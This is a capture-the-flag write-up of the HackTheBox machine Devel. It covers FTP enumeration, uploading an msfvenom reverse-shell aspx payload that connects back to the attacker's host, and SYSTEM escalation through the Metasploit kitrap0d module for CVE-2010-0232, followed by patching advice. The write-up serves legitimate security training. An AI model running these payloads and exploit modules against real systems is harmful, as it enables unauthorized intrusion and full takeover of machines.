GitHub icon LinkedIn icon d="M6.667 4h18.667c1.467 0 2.667 1.2 2.667 2.667v18.667c0 1.467-1.2 2.667-2.667 2.667H6.667A2.675 2.675 0 0 1 4 25.334V6.667C4 5.2 5.2 4 6.667 4zm16.946 8.44c.64-.533 1.387-1.173 1.72-1.88-.547.28-1.2.453-1.92.547.667-.48 1.>
Writeup - Devel (HTB)
3 min read

Writeup - Devel (HTB)

Writeup - Devel (HTB)

This is a writeup for the Devel machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 21/tcp : FTP (ftpd)
  • 80/tcp : HTTP web server (Apache 2.4.41)


I start by seeing if it is possible to connect to FTP as anonymous:

In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f aspx -o shell.aspx

I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.

I then access my previously uploaded payload at the following address:

I now have a reverse shell on the machine.

Privilege escalation

I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.

use post/multi/recon/local_exploit_suggester
set SESSION 19

The module has found a number of potential exploits.

I start by testing the first one:

use windows/local/bypassuac_eventtvwr
set SESSION 19

But without success. I test the second one:

use windows/local/ms10_015_kitrap0d
set SESSION 19

This one worked, I now have a reverse shell with the NT AUTHORITY\SYSTEM authorization.

The module MS10_015 is linked to CVE-2010-0232.

[...] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges [...] VK9 Security

I can now get both flags back.


To patch this host I think it would be necessary to perform a number of actions:

  • Disable writing to the FTP server as anonymous
  • Update Windows to patch CVE-2010-0232

Owned Devel from Hack The Box!
I have just owned machine Devel from Hack The Box